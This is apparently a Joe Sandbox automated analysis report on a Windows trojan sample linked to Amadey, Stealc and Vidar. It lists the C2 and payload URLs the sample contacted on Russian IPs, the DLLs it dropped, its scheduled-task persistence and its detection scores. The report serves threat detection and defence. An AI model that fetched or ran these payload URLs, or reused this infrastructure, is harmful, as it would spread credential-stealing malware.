C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	46%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://77.91.77.81/mine/amadka.exe	100%	Avira URL Cloud	phishing
http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07	0%	Avira URL Cloud	safe
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://77.91.77.81/stealc/random.exeer	100%	Avira URL Cloud	phishing
http://77.91.77.82/Hun4Ko/index.phpH	0%	Avira URL Cloud	safe
http://85.28.47.4/69934896f997d5bb/msvcp140.dllpk	100%	Avira URL Cloud	malware
http://77.91.77.81/cost/go.exe	100%	Avira URL Cloud	malware
http://85.28.47.4/	100%	Avira URL Cloud	malware
http://upx.sf.net	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
http://77.91.77.82/Hun4Ko/index.phpmp	0%	Avira URL Cloud	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://77.91.77.82/Hun4Ko/index.phpV	0%	Avira URL Cloud	safe
http://77.91.77.82/Hun4Ko/index.php	100%	Avira URL Cloud	phishing
http://77.91.77.82/Hun4Ko/index.php3	0%	Avira URL Cloud	safe
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll:-	100%	Avira URL Cloud	malware
http://85.28.47.4/920475a59bac849d.php-	100%	Avira URL Cloud	malware
http://85.28.47.4/EM32	100%	Avira URL Cloud	malware
http://77.91.77.82/Hun4Ko/index.php/	100%	Avira URL Cloud	phishing
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://77.91.77.82/Hun4Ko/index.php.	100%	Avira URL Cloud	phishing
http://77.91.77.81/stealc/random.exe506iN	100%	Avira URL Cloud	phishing
http://85.28.47.4/69934896f997d5bb/sqlite3.dll_k	100%	Avira URL Cloud	malware
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	0%	Avira URL Cloud	safe
http://85.28.47.4/69934896f997d5bb/softokn3.dll	100%	Avira URL Cloud	malware
https://support.mozilla.org	0%	URL Reputation	safe
http://85.28.47.4/69934896f997d5bb/mozglue.dll	100%	Avira URL Cloud	malware
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll	100%	Avira URL Cloud	malware
http://85.28.47.4/69934896f997d5bb/msvcp140.dll(	100%	Avira URL Cloud	malware
http://85.28.47.4/69934896f997d5bb/nss3.dll	100%	Avira URL Cloud	malware
http://85.28.47.4/69934896f997d5bb/freebl3.dlljk	100%	Avira URL Cloud	malware
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://77.91.77.81/mine/amadka.exe00	100%	Avira URL Cloud	phishing
http://77.91.77.82/	0%	Avira URL Cloud	safe
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
https://mozilla.org0/	0%	Avira URL Cloud	safe
http://85.28.47.4/69934896f997d5bb/freebl3.dll	100%	Avira URL Cloud	malware
http://85.28.47.4/920475a59bac849d.php	100%	Avira URL Cloud	malware
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
http://85.28.47.4/920475a59bac849d.phpon	100%	Avira URL Cloud	malware
http://77.91.77.81/stealc/random.exe	100%	Avira URL Cloud	phishing
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://77.91.77.81/cost/go.exe00	100%	Avira URL Cloud	phishing
http://85.28.47.4/69934896f997d5bb/sqlite3.dll	100%	Avira URL Cloud	malware
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	0%	Avira URL Cloud	safe
http://85.28.47.4/69934896f997d5bb/msvcp140.dll	100%	Avira URL Cloud	malware
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	0%	Avira URL Cloud	safe
http://77.91.77.82/Hun4Ko/index.phpk	0%	Avira URL Cloud	safe
http://77.91.77.81/mine/amadka.exepera	100%	Avira URL Cloud	phishing
http://85.28.47.4	100%	Avira URL Cloud	malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	0%	Avira URL Cloud	safe
http://77.91.77.82/Hun4Ko/index.phplF	0%	Avira URL Cloud	safe
http://pki-ocsp.symauth.com0	0%	Avira URL Cloud	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	0%	Avira URL Cloud	safe
http://77.91.77.82/Hun4Ko/index.phpu	0%	Avira URL Cloud	safe
http://77.91.77.81/cost/go.exeAppData	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
18.31.95.13.in-addr.arpa	unknown	unknown	false		unknown
86.23.85.13.in-addr.arpa	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://77.91.77.81/mine/amadka.exe	true	Avira URL Cloud: phishing	unknown
http://77.91.77.82/Hun4Ko/index.php	true	Avira URL Cloud: phishing	unknown
http://85.28.47.4/69934896f997d5bb/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://85.28.47.4/69934896f997d5bb/mozglue.dll	true	Avira URL Cloud: malware	unknown
http://85.28.47.4/69934896f997d5bb/nss3.dll	true	Avira URL Cloud: malware	unknown
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://85.28.47.4/69934896f997d5bb/freebl3.dll	true	Avira URL Cloud: malware	unknown
http://85.28.47.4/920475a59bac849d.php	true	Avira URL Cloud: malware	unknown
http://85.28.47.4/69934896f997d5bb/sqlite3.dll	true	Avira URL Cloud: malware	unknown
http://85.28.47.4/69934896f997d5bb/msvcp140.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	false	Avira URL Cloud: safe	unknown
http://77.91.77.81/cost/go.exe	file.exe, 00000000.00000002.2622413487.0000000000406000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: malware	unknown
http://77.91.77.82/Hun4Ko/index.phpH	explorti.exe, 0000000E.00000002.3408169203.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://85.28.47.4/	7873c16243.exe, 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07	file.exe, 7873c16243.exe.14.dr, random[1].exe.14.dr	false	Avira URL Cloud: safe	unknown
http://77.91.77.81/stealc/random.exeer	explorti.exe, 0000000E.00000002.3408169203.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr	file.exe, 7873c16243.exe.14.dr, random[1].exe.14.dr	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	false	URL Reputation: safe	unknown
http://85.28.47.4/69934896f997d5bb/msvcp140.dllpk	file.exe, 00000000.00000002.2623849094.000000000163F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://77.91.77.82/Hun4Ko/index.phpmp	explorti.exe, 0000000E.00000002.3408169203.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp, HJJEGIEHIJKKFIDHDGID.0.dr	false	Avira URL Cloud: safe	unknown
http://77.91.77.82/Hun4Ko/index.phpV	explorti.exe, 0000000E.00000002.3408169203.000000000079B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll:-	file.exe, 00000000.00000002.2623849094.000000000165F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://77.91.77.82/Hun4Ko/index.php3	explorti.exe, 0000000E.00000002.3408169203.000000000081B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://85.28.47.4/920475a59bac849d.php-	7873c16243.exe, 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://77.91.77.82/Hun4Ko/index.php/	explorti.exe, 0000000E.00000002.3408169203.000000000081B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://85.28.47.4/EM32	7873c16243.exe, 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://77.91.77.82/Hun4Ko/index.php.	explorti.exe, 0000000E.00000002.3408169203.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://77.91.77.81/stealc/random.exe506iN	explorti.exe, 0000000E.00000002.3408169203.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://85.28.47.4/69934896f997d5bb/sqlite3.dll_k	file.exe, 00000000.00000002.2623849094.000000000163F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	false	URL Reputation: safe	unknown
http://85.28.47.4/69934896f997d5bb/freebl3.dlljk	file.exe, 00000000.00000002.2623849094.000000000163F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://85.28.47.4/69934896f997d5bb/msvcp140.dll(	file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2652517990.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://77.91.77.81/mine/amadka.exe00	file.exe, 00000000.00000002.2622413487.0000000000406000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: phishing	unknown
http://77.91.77.82/	explorti.exe, 0000000E.00000002.3408169203.000000000081B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp, HJJEGIEHIJKKFIDHDGID.0.dr	false	Avira URL Cloud: safe	unknown
http://85.28.47.4/920475a59bac849d.phpon	7873c16243.exe, 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	HJJEGIEHIJKKFIDHDGID.0.dr	false	Avira URL Cloud: safe	unknown
http://77.91.77.81/stealc/random.exe	explorti.exe, 0000000E.00000002.3408169203.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://77.91.77.81/cost/go.exe00	file.exe, 00000000.00000002.2622413487.0000000000406000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: phishing	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.8.dr	false	URL Reputation: safe	unknown
http://77.91.77.81/mine/amadka.exepera	file.exe, 00000000.00000002.2622413487.0000000000406000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: phishing	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr	false	URL Reputation: safe	unknown
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp, HJJEGIEHIJKKFIDHDGID.0.dr	false	Avira URL Cloud: safe	unknown
http://85.28.47.4	file.exe, 00000000.00000002.2623849094.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, 7873c16243.exe, 0000000F.00000002.2839628750.0000000001C9E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp, HJJEGIEHIJKKFIDHDGID.0.dr	false	URL Reputation: safe	unknown
http://77.91.77.82/Hun4Ko/index.phpk	explorti.exe, 0000000E.00000002.3408169203.000000000079B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://pki-ocsp.symauth.com0	file.exe, 7873c16243.exe.14.dr, random[1].exe.14.dr	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp, HJJEGIEHIJKKFIDHDGID.0.dr	false	Avira URL Cloud: safe	unknown
http://77.91.77.82/Hun4Ko/index.phplF	explorti.exe, 0000000E.00000002.3408169203.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://support.mozilla.org	CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp, HJJEGIEHIJKKFIDHDGID.0.dr	false	Avira URL Cloud: safe	unknown
http://77.91.77.81/cost/go.exeAppData	file.exe, 00000000.00000002.2622413487.00000000004AA000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: phishing	unknown
http://77.91.77.82/Hun4Ko/index.phpu	explorti.exe, 0000000E.00000002.3408169203.000000000081B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
77.91.77.81	unknown	Russian Federation	42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	true
85.28.47.4	unknown	Russian Federation	31643	GES-ASRU	true
77.91.77.82	unknown	Russian Federation	42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1467093
Start date and time:	2024-07-03 18:07:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@17/30@2/3
EGA Information:	Successful, ratio: 40%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target BAFIEGIECG.exe, PID 5564 because there are no executed function
Execution Graph export aborted for target explorti.exe, PID 1780 because there are no executed function
Execution Graph export aborted for target explorti.exe, PID 6048 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
12:08:32	API Interceptor	44x Sleep call for process: file.exe modified
12:09:02	API Interceptor	128540x Sleep call for process: explorti.exe modified
18:08:51	Task Scheduler	Run new task: explorti path: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
77.91.77.81	d8gZVaN0ms.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, Vidar	Browse	77.91.77.81/Kiru9gu/index.php
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.81/stealc/random.exe
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.81/stealc/random.exe
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.81/stealc/random.exe
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.81/stealc/random.exe
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.81/stealc/random.exe
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.81/stealc/random.exe
	SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.81/stealc/random.exe
	Wf9qnVcbi8.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.81/stealc/random.exe
	setup.exe	Get hash	malicious	Amadey	Browse	77.91.77.81/Kiru9gu/index.php
85.28.47.4	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4/920475a59bac849d.php
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4/920475a59bac849d.php
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4/920475a59bac849d.php
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4/920475a59bac849d.php
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4/920475a59bac849d.php
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4/920475a59bac849d.php
	SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4/920475a59bac849d.php
	Wf9qnVcbi8.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4/920475a59bac849d.php
	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse	85.28.47.4/920475a59bac849d.php
	Rnteb46TuM.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4/920475a59bac849d.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	d8gZVaN0ms.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, Vidar	Browse	77.91.77.81
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82
	NBhsazR1jn.exe	Get hash	malicious	Amadey	Browse	77.91.77.81
	QFDXInkpM8.exe	Get hash	malicious	Amadey	Browse	77.91.77.81
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82
	https://drive.google.com/file/d/136ovnD62cwekGHQcz2rdHGNitd3tUNck/view?usp=sharing_eip_m&ts=6682d44d	Get hash	malicious	Unknown	Browse	77.91.77.5
GES-ASRU	d8gZVaN0ms.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, Vidar	Browse	85.28.47.7
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4
	SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4
	Wf9qnVcbi8.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	85.28.47.4
	setup.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, Stealc	Browse	85.28.47.7
FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	d8gZVaN0ms.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, Vidar	Browse	77.91.77.81
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82
	NBhsazR1jn.exe	Get hash	malicious	Amadey	Browse	77.91.77.81
	QFDXInkpM8.exe	Get hash	malicious	Amadey	Browse	77.91.77.81
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82
	https://drive.google.com/file/d/136ovnD62cwekGHQcz2rdHGNitd3tUNck/view?usp=sharing_eip_m&ts=6682d44d	Get hash	malicious	Unknown	Browse	77.91.77.5

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	i3NmF0obCm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	Wf9qnVcbi8.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	setup.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, Stealc	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	i3NmF0obCm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	Wf9qnVcbi8.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	setup.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, Stealc	Browse

Created / dropped Files

C:\ProgramData\BGDGHJEHJJDAAAKEBGCFCAAAAE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
